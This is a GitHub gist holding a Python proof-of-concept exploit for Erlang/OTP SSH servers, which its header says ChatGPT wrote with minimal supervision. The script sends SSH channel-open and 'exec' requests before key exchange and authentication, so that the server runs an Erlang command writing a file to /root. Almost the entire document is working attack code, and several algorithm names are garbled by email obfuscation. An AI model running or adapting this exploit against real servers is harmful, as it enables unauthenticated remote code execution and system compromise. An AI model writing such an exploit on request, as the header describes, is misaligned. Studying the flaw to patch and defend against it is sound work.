Created
April 17, 2025 20:44
-
-
Save gdbinit/e08e95ce77e031cd223c537ef67ed638 to your computer and use it in GitHub Desktop.
Erlang/OTP SSH Exploit PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Erlang/OTP SSH Exploit | |
| # | |
| # Written by ChatGPT with minimal supervision starting from the test case | |
| # Tested against Erlang/OTP 26.2.5.6 | |
| # | |
| # Have fun, | |
| # fG! | |
| # | |
| import socket | |
| import os | |
| import struct | |
| import time | |
# Address and TCP port of the SSH server that main() connects to.
SSH_SERVER = '127.0.0.1'
SSH_PORT = 2222
def build_ssh_string(s):
    """Encode *s* as a length-prefixed byte string.

    The result is a 4-byte big-endian unsigned length followed by the
    encoded bytes of *s*.

    Args:
        s: Text to encode; converted with ``str.encode()`` (UTF-8).

    Returns:
        The length prefix concatenated with the encoded bytes.
    """
    # Encode first so the prefix counts bytes on the wire rather than code
    # points; the two differ as soon as *s* holds a non-ASCII character.
    data = s.encode()
    return struct.pack('>I', len(data)) + data
def random_bytes(n):
    """Return *n* bytes obtained from ``os.urandom``."""
    blob = os.urandom(n)
    return blob
def build_kexinit_packet():
    """Build a framed SSH_MSG_KEXINIT packet.

    The payload is the message type byte 0x14, a 16-byte random cookie, ten
    length-prefixed name-lists, a zero ``first_kex_packet_follows`` byte and
    four reserved zero bytes. The payload is then framed by ``wrap_packet``.

    Returns:
        The framed packet as ``bytes``.
    """
    # NOTE(review): the "[email protected]" tokens below look like an
    # email-obfuscation artifact that replaced "name@domain" algorithm
    # identifiers; the intended names cannot be recovered from this file, so
    # the strings are kept exactly as found. Confirm against the original.
    kex_names = 'curve25519-sha256,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c'
    host_key_names = '[email protected],[email protected],[email protected],ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,[email protected],[email protected],[email protected],[email protected],ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa'
    cipher_names = '[email protected],aes128-ctr,aes192-ctr,aes256-ctr,[email protected],[email protected]'
    mac_names = '[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],hmac-sha2-256,hmac-sha2-512,hmac-sha1'
    compression_names = 'none,[email protected],zlib'

    # Encryption, MAC and compression lists are each sent twice, followed by
    # the two (empty) language lists.
    name_lists = (
        kex_names,
        host_key_names,
        cipher_names,
        cipher_names,
        mac_names,
        mac_names,
        compression_names,
        compression_names,
        '',  # languages_client_to_server
        '',  # languages_server_to_client
    )

    body = bytearray(b'\x14')  # SSH_MSG_KEXINIT
    body += random_bytes(16)  # cookie
    for names in name_lists:
        body += build_ssh_string(names)
    body += b'\x00'  # first_kex_packet_follows
    body += b'\x00\x00\x00\x00'  # reserved
    return wrap_packet(bytes(body))
def wrap_packet(payload):
    """Frame *payload* as an unencrypted SSH binary packet.

    Layout: 4-byte big-endian packet length, 1-byte padding length, the
    payload, then random padding. The padding is sized so the whole packet
    is a multiple of 8 bytes and is never shorter than 4 bytes.

    Args:
        payload: Raw message bytes, starting with the message type byte.

    Returns:
        The framed packet as ``bytes``.
    """
    align = 8
    # 5 = the 4-byte length field plus the 1-byte padding-length field.
    pad_len = -(len(payload) + 5) % align
    if pad_len < 4:
        pad_len += align
    filler = os.urandom(pad_len)
    # packet_length covers the padding-length byte, the payload and the padding.
    header = struct.pack('>IB', len(payload) + pad_len + 1, pad_len)
    return header + payload + filler
def build_channel_open():
    """Build a framed channel-open packet for a 'session' channel.

    The payload is the message type byte 0x5a, the channel type string
    'session', then three big-endian 32-bit integers: sender channel 0,
    initial window size 0x68000 and maximum packet size 0x10000.

    Returns:
        The framed packet as ``bytes``.
    """
    # sender channel, initial window size, maximum packet size
    numeric_fields = struct.pack('>III', 0, 0x68000, 0x10000)
    body = b''.join((b'\x5a', build_ssh_string('session'), numeric_fields))
    return wrap_packet(body)
def build_channel_request():
    """Build a framed channel-request packet of type 'exec'.

    The payload is the message type byte 0x62, recipient channel 0, the
    request type string 'exec', a want-reply byte of 1, and the command
    string.

    Returns:
        The framed packet as ``bytes``.
    """
    # the command we want to send
    command_text = 'file:write_file("/root/pwned", "hello!").'
    fields = (
        b'\x62',                          # message type
        struct.pack('>I', 0),             # recipient channel
        build_ssh_string('exec'),         # request type
        b'\x01',                          # want_reply
        build_ssh_string(command_text),   # command
    )
    return wrap_packet(b''.join(fields))
def _recv_exact(sock, count):
    """Read up to *count* bytes from *sock*, stopping early only if it closes."""
    chunks = []
    remaining = count
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:  # an empty read means the peer closed the connection
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)


def recv_packet(sock):
    """Read one unencrypted SSH binary packet from *sock*.

    Args:
        sock: Object with a ``recv(n)`` method returning ``bytes``.

    Returns:
        A ``(msg_type, payload)`` tuple: ``payload`` is the packet body
        without padding and ``msg_type`` is its first byte as an ``int``.

    Raises:
        ValueError: If the connection closes before a full packet arrives,
            or the header describes an empty or oversized packet.
    """
    # Sanity cap so a bogus length field cannot make us wait for gigabytes.
    max_packet_length = 256 * 1024

    # recv() may return fewer bytes than requested, so loop until the whole
    # 5-byte header (4-byte length + 1-byte padding length) is in hand.
    hdr = _recv_exact(sock, 5)
    if len(hdr) < 5:
        raise ValueError("Incomplete SSH packet header received")
    packet_length, padding_length = struct.unpack('>IB', hdr)

    # packet_length counts the padding-length byte, payload and padding.
    payload_length = packet_length - padding_length - 1
    if payload_length < 1:
        raise ValueError("Malformed SSH packet: no message type byte")
    if packet_length > max_packet_length:
        raise ValueError("SSH packet length exceeds sanity limit")

    body = _recv_exact(sock, packet_length - 1)
    if len(body) < packet_length - 1:
        raise ValueError("Incomplete SSH packet body received")

    payload = body[:payload_length]
    return payload[0], payload
def main():
    """Run the proof-of-concept exchange against SSH_SERVER:SSH_PORT.

    Steps: read the server banner, send a client banner, send KEXINIT and
    print the server's reply, then send a channel-open and an 'exec'
    channel-request without performing key exchange or authentication
    first, and print whatever the server sends back.

    Only run this against a host you are authorized to test.
    """
    # The context manager closes the socket on every exit path, including
    # a failed connect or send.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((SSH_SERVER, SSH_PORT))

        # Step 1: Receive banner
        banner = s.recv(256)
        # errors='replace' keeps a non-UTF-8 banner from aborting the run.
        print(f"[+] Server banner: {banner.decode(errors='replace').strip()}")

        # Step 2: Send client banner
        client_banner = b'SSH-2.0-EarlyRCE_KEXINIT_Test\r\n'
        s.sendall(client_banner)
        print("[+] Sent client banner")
        time.sleep(0.5)

        # Step 3: Send KEXINIT
        kexinit_packet = build_kexinit_packet()
        s.sendall(kexinit_packet)
        print("[+] Sent valid SSH_MSG_KEXINIT")

        # Step 4: Receive server response (best effort; failures are reported
        # and the run continues)
        try:
            msg_type, payload = recv_packet(s)
            print(f"[+] Received server message type: {msg_type:#04x}")
            if msg_type == 0x14:
                print("[*] Server responded with SSH_MSG_KEXINIT (as expected).")
                print(payload)
            else:
                print(f"[*] Server responded with unexpected message: type {msg_type}")
        except Exception as e:
            print(f"[-] Error reading server response: {e}")

        # Step 5: Send CHANNEL_OPEN early
        s.sendall(build_channel_open())
        print("[+] Sent SSH_MSG_CHANNEL_OPEN (early)")
        time.sleep(0.5)

        # Step 6: Send CHANNEL_REQUEST early
        s.sendall(build_channel_request())
        print("[+] Sent SSH_MSG_CHANNEL_REQUEST (early)")

        # Step 7: Receive server's reaction
        try:
            response = s.recv(1024)
            print("[+] Server response:", response)
        except Exception as e:
            print("[-] Error receiving response:", e)
# Run the exchange only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment